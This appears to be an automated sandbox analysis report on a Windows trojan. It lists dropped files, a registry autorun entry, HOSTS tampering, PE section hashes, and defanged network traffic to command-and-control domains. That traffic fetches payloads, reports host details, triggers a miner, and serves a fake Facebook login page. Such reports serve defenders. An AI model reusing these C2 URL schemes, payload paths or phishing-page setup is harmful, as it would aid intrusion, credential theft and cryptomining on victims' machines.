%System%\mqyitew\purple\libgobject-2.0-0.dll (2105 bytes)
%System%\mqyitew\purple\ca-certs\StartCom_Certification_Authority.pem (2 bytes)
%System%\mqyitew\purple\ca-certs\VeriSign_Class_3_Public_Primary_Certification_Authority_-_G5.pem (1 bytes)
%System%\mqyitew\purple\sasl2\saslPLAIN.dll (601 bytes)
%System%\mqyitew\purple\ca-certs\AOL_Member_CA.pem (1 bytes)
%System%\mqyitew\purple\sasl2\saslCRAMMD5.dll (601 bytes)
%System%\mqyitew\purple\libssp-0.dll (36 bytes)
%System%\mqyitew\purple\ca-certs\DigiCertHighAssuranceEVRootCA.pem (1 bytes)
%System%\mqyitew\purple\libplds4.dll (14 bytes)
%System%\mqyitew\purple\ca-certs\Thawte_Primary_Root_CA.pem (1 bytes)
%System%\mqyitew\purple\libgmodule-2.0-0.dll (36 bytes)
%System%\mqyitew\purple\nss3.dll (5873 bytes)
%System%\mqyitew\purple\freebl3.dll (1425 bytes)
%System%\mqyitew\purple\ca-certs\Equifax_Secure_Global_eBusiness_CA-1.pem (964 bytes)
%System%\mqyitew\purple\libgcc_s_dw2-1.dll (601 bytes)
%System%\mqyitew\purple\ca-certs\CAcert_Root.pem (2 bytes)
%System%\mqyitew\purple\ca-certs\VeriSign_Class_3_Public_Primary_Certification_Authority_-_G5_2.pem (1 bytes)
%System%\mqyitew\purple\plugins\statenotify.dll (15 bytes)
%System%\mqyitew\purple\plugins\ssl-nss.dll (28 bytes)
%System%\mqyitew\purple\sasl2\saslDIGESTMD5.dll (673 bytes)
%System%\mqyitew\purple\libjabber.dll (2321 bytes)
%System%\mqyitew\purple\ca-certs\VeriSign_Class3_Extended_Validation_CA.pem (2 bytes)
%System%\mqyitew\purple\libplc4.dll (15 bytes)
%System%\mqyitew\purple\ca-certs\CAcert_Class3.pem (2 bytes)
%System%\mqyitew\purple\ca-certs\Baltimore_CyberTrust_Root.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\Thawte_Premium_Server_CA.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\DigiCertHighAssuranceCA-3.pem (2 bytes)
%System%\mqyitew\purple\zlib1.dll (673 bytes)
%System%\mqyitew\purple\libglib-2.0-0.dll (7726 bytes)
%System%\mqyitew\purple\ca-certs\America_Online_Root_Certification_Authority_1.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\Deutsche_Telekom_Root_CA_2.pem (1 bytes)
%System%\mqyitew\purple\plugins\ssl.dll (12 bytes)
%System%\mqyitew\purple\plugins\libxmpp.dll (21 bytes)
%System%\mqyitew\purple\libxml2-2.dll (7971 bytes)
%System%\mqyitew\purple\ca-certs\VeriSign_Class_3_Public_Primary_Certification_Authority_-_G2.pem (1 bytes)
%System%\mqyitew\purple\libgthread-2.0-0.dll (44 bytes)
%System%\mqyitew\purple\softokn3.dll (673 bytes)
%System%\mqyitew\purple\ca-certs\Go_Daddy_Class_2_CA.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\VeriSign_International_Server_Class_3_CA.pem (1 bytes)
%System%\mqyitew\purple\sasl2\saslLOGIN.dll (601 bytes)
%System%\mqyitew\purple\libsasl.dll (673 bytes)
%System%\mqyitew\purple\libymsg.dll (1281 bytes)
%System%\mqyitew\purple\ca-certs\Equifax_Secure_CA.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\GTE_CyberTrust_Global_Root.pem (876 bytes)
%System%\mqyitew\purple\sasl2\saslANONYMOUS.dll (601 bytes)
%System%\mqyitew\dropbox\package.json (767 bytes)
%System%\mqyitew\dropbox\googleTakeout.js (14 bytes)
%System%\mqyitew\dropbox\mouse.js (4 bytes)
%System%\mqyitew\dropbox\phantomjs197.exe (53130 bytes)
%System%\mqyitew\dropbox\querystring.js (5 bytes)
%System%\mqyitew\dropbox\casper.js (601 bytes)
%System%\mqyitew\dropbox\cli.js (5 bytes)
%System%\mqyitew\dropbox\pagestack.js (4 bytes)
%System%\mqyitew\dropbox\http.js (2 bytes)
%System%\mqyitew\dropbox\colorizer.js (4 bytes)
%System%\mqyitew\dropbox\bootstrap.js (14 bytes)
%System%\mqyitew\dropbox\events.js (8 bytes)
%System%\mqyitew\dropbox\tester.js (59 bytes)
%System%\mqyitew\dropbox\dropbox2.js (25 bytes)
%System%\mqyitew\dropbox\clientutils.js (35 bytes)
%System%\mqyitew\dropbox\utils.js (21 bytes)
%System%\mqyitew\dropbox\xunit.js (6 bytes)
%WinDir%\Temp\glhljywourzj.exe (5873 bytes)
%System%\unzip.exe (7100 bytes)
%System%\win64mrocli2.exe (76437 bytes)
%System%\mqyitew\purple\purple.zip (90422 bytes)
%System%\mqyitew\rng (152 bytes)
%WinDir%\Temp\glhljywg9qzj.exe (1940 bytes)
%System%\win32mrocli2.exe (27367 bytes)
%System%\drivers\etc\hosts (904 bytes)
%System%\mqyitew\run (10 bytes)
%System%\mqyitew\por (1 bytes)
%System%\mqyitew\ihst (226 bytes)
%WinDir%\Temp\glhljywapnzj.exe (35 bytes)
%WinDir%\Temp\glhljywpp4zj.exe (35 bytes)
%System%\mqyitew\dropbox\dropbox.zip (181699 bytes)
%System%\mqyitew\purple\zip.exe (10500 bytes)
%System%\win64mroaes2.exe (76437 bytes)
%System%\eityzygishyx.exe (5873 bytes)
%System%\mqyitew\cfg (659 bytes)
%System%\mqyitew\purple\exefile (14580 bytes)
%WinDir%\Temp\glhljyw1jczj.exe (35 bytes)
%System%\unovkkdak.exe (5873 bytes)
%System%\mqyitew\etc (10 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Presentation Accounts Workstation" = "%System%\unovkkdak.exe" - Restore the original content of the HOSTS file (%System%\drivers\etc\hosts): 127.0.0.1 localhost
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 632022 | 632320 | 4.70428 | a4fc99eea97ccdb182d32f3844055d71 |
.rdata | 638976 | 51644 | 51712 | 3.67152 | f06b92dfc0ddc505a883d9334948e6bd |
.data | 692224 | 159104 | 125440 | 5.4979 | 6991e368cfd31d00429808c0f0c682a2 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://welltalk.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b528200 | 210.172.144.247 |
hxxp://wellshirt.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b528200 | 98.139.135.198 |
hxxp://wellshirt.net/forum/search.php?method=all&flag&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | 98.139.135.198 |
hxxp://wellshirt.net/forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz (2393 MHz)&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | 98.139.135.198 |
hxxp://wellshirt.net/forum/search.php?method=dep&noxor&file=dropbox.dep&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | 98.139.135.198 |
hxxp://wellshirt.net/dep/dropbox.zip | 98.139.135.198 |
hxxp://wellshirt.net/dep/win64mrocli2.exe | 98.139.135.198 |
hxxp://wellshirt.net/forum/search.php?method=hostname&host=www.facebook.com&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | 98.139.135.198 |
hxxp://wellshirt.net/dep/win64mroaes2.exe | 98.139.135.198 |
hxxp://wellshirt.net/forum/search.php?method=dep&noxor&file=purple.dep&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | 98.139.135.198 |
hxxp://wellshirt.net/forum/search.php?method=post&type=miner_forced&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | 98.139.135.198 |
hxxp://wellshirt.net/dep/purple.zip | 98.139.135.198 |
hxxp://wellshirt.net/forum/search.php?method=checkport&port=48744&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | 98.139.135.198 |
hxxp://wellshirt.net/dep/zip.exe | 98.139.135.198 |
hxxp://wellshirt.net/forum/search.php?method=dep&noxor&file=exefile&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | 98.139.135.198 |
hxxp://wellshirt.net/forum/search.php?method=all&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | 98.139.135.198 |
hxxp://www.fileswap.com/ | 216.155.129.123 |
hxxp://www.fileswap.com/_css/global.css?v=54 | 216.155.129.123 |
hxxp://www.fileswap.com/_js/jquery.js | 216.155.129.123 |
hxxp://www.fileswap.com/_js/jquery-ui.js | 216.155.129.123 |
hxxp://www.fileswap.com/_js/AC_OETags.js | 216.155.129.123 |
hxxp://www.fileswap.com/_js/global.js?ver=d10 | 216.155.129.123 |
hxxp://www.fileswap.com/ext/swfupload/swfupload.js | 216.155.129.123 |
hxxp://www.fileswap.com/ext/swfupload/handlers.js?v=ebg | 216.155.129.123 |
hxxp://www.fileswap.com/_images/footer_bg.png | 216.155.129.123 |
hxxp://www.fileswap.com/_images/ico_24_upload.png | 216.155.129.123 |
hxxp://www.fileswap.com/_images/ico_24_sharelink.png | 216.155.129.123 |
hxxp://www.fileswap.com/_images/ico_24_social.png | 216.155.129.123 |
hxxp://www.fileswap.com/_images/ajax-loader.gif | 216.155.129.123 |
hxxp://www.fileswap.com/_images/icon/ico_footer_twitter.png | 216.155.129.123 |
hxxp://www.fileswap.com/_images/contact_support.png | 216.155.129.123 |
hxxp://www.fileswap.com/_images/header_bg.png | 216.155.129.123 |
hxxp://www.fileswap.com/_images/logo/fileswap_large.png | 216.155.129.123 |
hxxp://www.fileswap.com/_images/header_upload.png | 216.155.129.123 |
hxxp://www.fileswap.com/_images/header_sync.png | 216.155.129.123 |
hxxp://www.fileswap.com/_images/header_upgrade.png | 216.155.129.123 |
hxxp://www.fileswap.com/_images/header_refer.png | 216.155.129.123 |
hxxp://www.fileswap.com/_images/login_highlight.png | 216.155.129.123 |
hxxp://www.fileswap.com/_images/statement_bg.jpg | 216.155.129.123 |
hxxp://e3821.dspe1.akamaiedge.net/en_US/all.js | |
hxxp://www.fileswap.com/_images/home/home_gradient_01.png | 216.155.129.123 |
hxxp://www.fileswap.com/_images/home/home_upload_01.jpg | 216.155.129.123 |
hxxp://www.fileswap.com/_images/home/home_upload_button.png | 216.155.129.123 |
hxxp://www.fileswap.com/_images/home/home_gradient_02.png | 216.155.129.123 |
hxxp://www.fileswap.com/_images/home/home_signup_button.png | 216.155.129.123 |
hxxp://www.fileswap.com/_images/home/home_upload_02.jpg | 216.155.129.123 |
hxxp://www.fileswap.com/_images/footer_bg2.png | 216.155.129.123 |
hxxp://pagead.l.doubleclick.net/pagead/conversion/1072568869/?random=1401447789574&cv=7&fst=1401447789574&num=1&fmt=3&value=0&label=nJZCCOiW1wEQpbS4_wM&bg=ffffff&hl=en&guid=ON&u_h=768&u_w=1024&u_ah=740&u_aw=1024&u_cd=32&u_his=1&u_tz=180&u_java=false&u_nplug=0&u_nmime=0&frm=0&url=http://www.fileswap.com/ | |
hxxp://plus.l.google.com/ga.js | |
hxxp://a749.dsw4.akamai.net/connect/xd_arbiter/V80PAcvrynR.js?version=41 | |
hxxp://plus.l.google.com/__utm.gif?utmwv=5.5.1&utms=1&utmn=811700353&utmhn=www.fileswap.com&utmcs=UTF-8&utmsr=1024x768&utmvp=1243x779&utmsc=32-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=FileSwap.com : Upload Files, Free File Hosting, Cloud Storage&utmhid=2142558865&utmr=-&utmp=/&utmht=1401447789769&utmac=UA-1366737-9&utmcc=__utma=182058928.686437553.1401447790.1401447790.1401447790.1;+__utmz=182058928.1401447790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmu=q~ | |
hxxp://pagead.l.doubleclick.net/pagead/viewthroughconversion/1072568869/?random=1968204886&cv=7&fst=1401447789574&num=1&fmt=3&value=0&label=nJZCCOiW1wEQpbS4_wM&bg=ffffff&hl=en&guid=ON&u_h=768&u_w=1024&u_ah=740&u_aw=1024&u_cd=32&u_his=1&u_tz=180&u_java=false&u_nplug=0&u_nmime=0&frm=0&url=http://www.fileswap.com/&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0 | |
hxxp://wellshirt.net/fb_login/?session=3b528200 | 98.139.135.198 |
hxxp://www.google.com/ads/user-lists/1072568869/?label=nJZCCOiW1wEQpbS4_wM&fmt=3&bg=ffffff&num=1&ct_cookie_present=false&cv=7&frm=0&url=http://www.fileswap.com/&random=2372120351 | 173.194.43.50 |
hxxp://www.google.ca/ads/user-lists/1072568869/?label=nJZCCOiW1wEQpbS4_wM&fmt=3&bg=ffffff&num=1&ct_cookie_present=false&cv=7&frm=0&url=http://www.fileswap.com/&random=2372120351&ipr=y | 173.194.43.56 |
hxxp://wellshirt.net/fb_login/index_files/VYqjPg0eFkT.css?session=3b528200 | 98.139.135.198 |
hxxp://wellshirt.net/fb_login/index_files/QzuAG9bQwbS.css?session=3b528200 | 98.139.135.198 |
hxxp://wellshirt.net/fb_login/index_files/zWUlWu-0Z1T.css?session=3b528200 | 98.139.135.198 |
hxxp://wellshirt.net/fb_login/index_files/u8iA3kXb8Y1.css?session=3b528200 | 98.139.135.198 |
hxxp://wellshirt.net/fb_login/index_files/z15ZzhgIj4W.css?session=3b528200 | 98.139.135.198 |
hxxp://wellshirt.net/fb_login/index_files/YpD-WuoLxM8.js?session=3b528200 | 98.139.135.198 |
hxxp://wellshirt.net/fb_login/index_files/kHhQaysvKcA.js?session=3b528200 | 98.139.135.198 |
hxxp://wellshirt.net/fb_login/index_files/lV3BV1YRc-7.js?session=3b528200 | 98.139.135.198 |
hxxp://wellshirt.net/fb_login/index_files/wNhnmk7Kpi3.js?session=3b528200 | 98.139.135.198 |
hxxp://wellshirt.net/fb_login/index_files/xgsOhvNndM-.js?session=3b528200 | 98.139.135.198 |
hxxp://wellshirt.net/fb_login/index_files/tjP47PMhke1.js?session=3b528200 | 98.139.135.198 |
hxxp://wellshirt.net/fb_login/index_files/-PAXP-deijE.gif?session=3b528200 | 98.139.135.198 |
hxxp://wellshirt.net/fb_login/index_files/276449379149296_1535348985.png?session=3b528200 | 98.139.135.198 |
hxxp://wellshirt.net/fb_login/index_files/276449379149296_1538611903.png?session=3b528200 | 98.139.135.198 |
hxxp://wellshirt.net/fb_login/index_files/276449379149296_367648155.png?session=3b528200 | 98.139.135.198 |
hxxp://wellshirt.net/fb_login/index_files/276449379149296_646761364.png?session=3b528200 | 98.139.135.198 |
hxxp://wellshirt.net/fb_login/index_files/GsNJNwuI-UM.gif?session=3b528200 | 98.139.135.198 |
hxxp://wellshirt.net/fb_login/index_files/safe_image.png?session=3b528200 | 98.139.135.198 |
hxxp://middleevery.net/fb_login/?session=3b528200 | 98.139.135.198 |
hxxp://www.googleadservices.com/pagead/conversion/1072568869/?random=1401447789574&cv=7&fst=1401447789574&num=1&fmt=3&value=0&label=nJZCCOiW1wEQpbS4_wM&bg=ffffff&hl=en&guid=ON&u_h=768&u_w=1024&u_ah=740&u_aw=1024&u_cd=32&u_his=1&u_tz=180&u_java=false&u_nplug=0&u_nmime=0&frm=0&url=http://www.fileswap.com/ | 173.194.43.45 |
hxxp://static.ak.facebook.com/connect/xd_arbiter/V80PAcvrynR.js?version=41 | 184.84.243.200 |
hxxp://middleevery.net/fb_login/index_files/u8iA3kXb8Y1.css?session=3b528200 | 98.139.135.198 |
hxxp://connect.facebook.net/en_US/all.js | 23.66.191.139 |
hxxp://www.google-analytics.com/__utm.gif?utmwv=5.5.1&utms=1&utmn=811700353&utmhn=www.fileswap.com&utmcs=UTF-8&utmsr=1024x768&utmvp=1243x779&utmsc=32-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=FileSwap.com : Upload Files, Free File Hosting, Cloud Storage&utmhid=2142558865&utmr=-&utmp=/&utmht=1401447789769&utmac=UA-1366737-9&utmcc=__utma=182058928.686437553.1401447790.1401447790.1401447790.1;+__utmz=182058928.1401447790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmu=q~ | 173.194.43.38 |
hxxp://middleevery.net/fb_login/index_files/lV3BV1YRc-7.js?session=3b528200 | 98.139.135.198 |
hxxp://middleevery.net/fb_login/index_files/z15ZzhgIj4W.css?session=3b528200 | 98.139.135.198 |
hxxp://middleevery.net/dep/win64mrocli2.exe | 98.139.135.198 |
hxxp://middleevery.net/fb_login/index_files/safe_image.png?session=3b528200 | 98.139.135.198 |
hxxp://middleevery.net/fb_login/index_files/kHhQaysvKcA.js?session=3b528200 | 98.139.135.198 |
hxxp://middleevery.net/fb_login/index_files/QzuAG9bQwbS.css?session=3b528200 | 98.139.135.198 |
hxxp://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072568869/?random=1968204886&cv=7&fst=1401447789574&num=1&fmt=3&value=0&label=nJZCCOiW1wEQpbS4_wM&bg=ffffff&hl=en&guid=ON&u_h=768&u_w=1024&u_ah=740&u_aw=1024&u_cd=32&u_his=1&u_tz=180&u_java=false&u_nplug=0&u_nmime=0&frm=0&url=http://www.fileswap.com/&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0 | 173.194.43.58 |
hxxp://middleevery.net/dep/zip.exe | 98.139.135.198 |
hxxp://middleevery.net/fb_login/index_files/YpD-WuoLxM8.js?session=3b528200 | 98.139.135.198 |
hxxp://middleevery.net/dep/dropbox.zip | 98.139.135.198 |
hxxp://middleevery.net/fb_login/index_files/wNhnmk7Kpi3.js?session=3b528200 | 98.139.135.198 |
hxxp://middleevery.net/fb_login/index_files/276449379149296_1538611903.png?session=3b528200 | 98.139.135.198 |
hxxp://middleevery.net/dep/win64mroaes2.exe | 98.139.135.198 |
hxxp://middleevery.net/fb_login/index_files/GsNJNwuI-UM.gif?session=3b528200 | 98.139.135.198 |
hxxp://middleevery.net/fb_login/index_files/276449379149296_646761364.png?session=3b528200 | 98.139.135.198 |
hxxp://middleevery.net/fb_login/index_files/276449379149296_1535348985.png?session=3b528200 | 98.139.135.198 |
hxxp://middleevery.net/fb_login/index_files/276449379149296_367648155.png?session=3b528200 | 98.139.135.198 |
hxxp://middleevery.net/fb_login/index_files/-PAXP-deijE.gif?session=3b528200 | 98.139.135.198 |
hxxp://middleevery.net/dep/purple.zip | 98.139.135.198 |
hxxp://middleevery.net/fb_login/index_files/zWUlWu-0Z1T.css?session=3b528200 | 98.139.135.198 |
hxxp://middleevery.net/fb_login/index_files/xgsOhvNndM-.js?session=3b528200 | 98.139.135.198 |
hxxp://middleevery.net/fb_login/index_files/VYqjPg0eFkT.css?session=3b528200 | 98.139.135.198 |
hxxp://www.google-analytics.com/ga.js | 173.194.43.38 |
hxxp://middleevery.net/fb_login/index_files/tjP47PMhke1.js?session=3b528200 | 98.139.135.198 |
minin.gs | 107.170.193.84 |
fbstatic-a.akamaihd.net | 184.84.243.200 |
s-static.ak.facebook.com | 23.66.178.110 |
apis.google.com | 173.194.43.40 |
chat.facebook.com | 173.252.107.17 |
error.facebook.com | 31.13.69.160 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /pagead/viewthroughconversion/1072568869/?random=1968204886&cv=7&fst=1401447789574&num=1&fmt=3&value=0&label=nJZCCOiW1wEQpbS4_wM&bg=ffffff&hl=en&guid=ON&u_h=768&u_w=1024&u_ah=740&u_aw=1024&u_cd=32&u_his=1&u_tz=180&u_java=false&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.fileswap.com/&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://VVV.fileswap.com/
Accept: */*
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: googleads.g.doubleclick.net
HTTP/1.1 302 Found
P3P: policyref="hXXp://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Fri, 30 May 2014 15:56:12 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Location: hXXp://VVV.google.com/ads/user-lists/1072568869/?label=nJZCCOiW1wEQpbS4_wM&fmt=3&bg=ffffff&num=1&ct_cookie_present=false&cv=7&frm=0&url=http://VVV.fileswap.com/&random=2372120351
Content-Type: image/gif
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block
Alternate-Protocol: 80:quic
Set-Cookie: test_cookie=CheckForPermission; expires=Fri, 30-May-2014 16:11:12 GMT; path=/; domain=.doubleclick.net
GIF89a.............!.......,...........D.;..
GET /fb_login/?session=3b528200 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Referer: hXXp://VVV.fileswap.com/
Connection: close
Accept-Language: en-US,*
Host: middleevery.net
HTTP/1.1 200 OK
Date: Fri, 30 May 2014 15:56:12 GMT
Set-Cookie: BX=dbnbs819ohags&b=3&s=gs; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.middleevery.net
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 2
Connection: close
Server: YTS/1.20.28
.<!DOCTYPE html>.<html id="facebook" class="canHaveFixedElements" lang="en"><head>.<meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta charset="utf-8"><script>function envFlush(a){function b(c){for(var d in a)c[d]=a[d];}if(window.requireLazy){requireLazy(['Env'],b);}else{Env=window.Env||{};b(Env);}}envFlush({"ffid1":"AcHKD6PoX2xFbcVkoIMPSwT-mjiSNxXUTRjwUd3Yp1_EYEq_w-NFvMeWHUfw1XVxiiw","ffid2":"AcEFu56i6aA6VpuY7zf28xde8QxejU8YtgQMai3iTb5YgCTNuz8hNm_PaLGlodmqOpY","ffid3":"AcH3wXq-O_VXCipLT3BNx1Yj1vIR_2-_Sm91YeYGWEygxMYVX2ZYA3lca5O1VnMT7JIGk_NVjQ_r52TNgis-_3Fh","ffid4":"AcHbEP4Fkpz1ZfifbEso0ekacGz00hYYhksxdiDUrQfBTGODZ1mWbHJKRANR8uDDsk8","ffver":63083,"recaptcha_focus_on_load":"false","recaptcha_lang":"\"en\"","user":"0","locale":"en_US","method":"GET","svn_rev":772429,"tier":"","push_phase":"V3","pkg_cohort":"EXP1:DEFAULT","vip":"69.171.229.25","www_base":"http:\/\/VVV.facebook.com\/","rep_lag":2,"fb_dtsg":"AQButNFh","ajaxpipe_token":"AXgCPts7l-QsNxPv","lhsh":"4AQGq_2W7","tracking_domain":"https:\/\/pixel.facebook.com","retry_ajax_on_network_error":"1","fbid_emoticons":"1"});</script><script>envFlush({"eagleEyeConfig":{"seed":"0ejD"}});CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/?_fb_noscript=1" /></noscript><meta name="robots" content="noodp, noydir"><meta name="referrer" content="default" id="meta_referrer"><meta name="description" content="Facebook is a social utili
<<
<<< skipped >>>
GET /fb_login/index_files/u8iA3kXb8Y1.css?session=3b528200 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Accept: text/css,*/*;q=0.1
Referer: hXXp://middleevery.net/fb_login/
Connection: close
Accept-Language: en-US,*
Host: middleevery.net
HTTP/1.1 200 OK
Date: Fri, 30 May 2014 15:56:13 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT
Accept-Ranges: bytes
Content-Length: 103
Content-Type: text/css
Age: 0
Connection: close
Server: YTS/1.20.28
/*1354335490,178142533*/...fbRegistrationPPT .text{font-size:11px}..#bootloader_VuNPD { height: 42px; }..
GET /connect/xd_arbiter/V80PAcvrynR.js?version=41 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Referer: hXXp://VVV.fileswap.com/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: static.ak.facebook.com
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: LzWU/tjEwMFRT0 02NV5KDUHMw6QAuPeUPFnPwyiNEM=
Vary: Accept-Encoding
Content-Length: 8779
Cache-Control: public, max-age=31356073
Expires: Thu, 28 May 2015 13:57:25 GMT
Date: Fri, 30 May 2014 15:56:12 GMT
Connection: keep-alive
...........|i..F..w....]@..Q..n..U#..G3.F...&.z.@....,.........H.(......(.yFFDF........_|....V....k..3..:.....b..&..z.&Y..9..0...,c.0.[...<.n...-.w......K.y~c.....8o..7......%3.k.#..y..M3..'.|..E..a.;.lS./..z?.p/o..$O...7..S..IM.E.4...%..%....}.....l.,..=;.;TuN.....a.=.......|..-.u..%..J..vw...[..}y...U.M.cC<.N.~....W...,...(IRG<.a.c..Z...K&......( .....BO.IF.Ln.:..A.......P.2Mar.E.....A.5#.....)..39.......9........c.$.]H...(.b..X...X<...A....#.d^@...,L........F9O.......9&.&.70...3h y.\.Z.9.h..Is...d.^.krfq|...9Y...4!s...a..c.L.Bl..*CP..^.U..J...ba.^8pCwL.Z.........~fuY2..T...../M.....K.c.........J..-..vH...]...N.......$.#.n..B.F...I..il\.!0bY.Z...9..{50......\P0]....:.*F...d.}.......fwP.....Q...F:.1..H....F..bL.... Ix.......\.."...u..N..e.....m@.....:.Fa....bM7h4...2w...x:...M@.E..._x.J-. ..(.....m ..8.-f.M..... .\i....ky.4.dLM............ F.X.~..H.@.9...I.%..d 5.....)v...c..i...(.~........G.2d6.7.C.Z.0.`. .0.Yd-Y..v.g....c8.r.H........7.....O({.......,..8Y..@...z..X........<!..x4j..........e.k.._........3...Y....E.b...X.E.[Cn..... .H.C!.@.G.-.=...S V..."%...6.......?p<.Y.!.....&....s.&..vbr..w...9......rds..o.!.f.y.....d.........n.......Xs....Z.R.j....A.%..~.....?..'.0>..C.......hp..x.]..9.b...U..n..Ig"....P9.......=....r.0{....F.:......@o....."...........1..&q.@...:..P......E.....pa.....O...........~...h....!O...J......S......Z......_........x.......W..>..../...^C|....../O........e.G.w4."...Zc.o0Y._..q............/L........A.}....\<.......G.q...xL..&.jX.....w.....k..^.....&hA...0J}
<<
<<< skipped >>>
GET /connect/xd_arbiter/V80PAcvrynR.js?version=41 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Referer: hXXp://VVV.fileswap.com/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: static.ak.facebook.com
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: LzWU/tjEwMFRT0 02NV5KDUHMw6QAuPeUPFnPwyiNEM=
Vary: Accept-Encoding
Content-Length: 8779
Cache-Control: public, max-age=31356072
Expires: Thu, 28 May 2015 13:57:25 GMT
Date: Fri, 30 May 2014 15:56:13 GMT
Connection: keep-alive
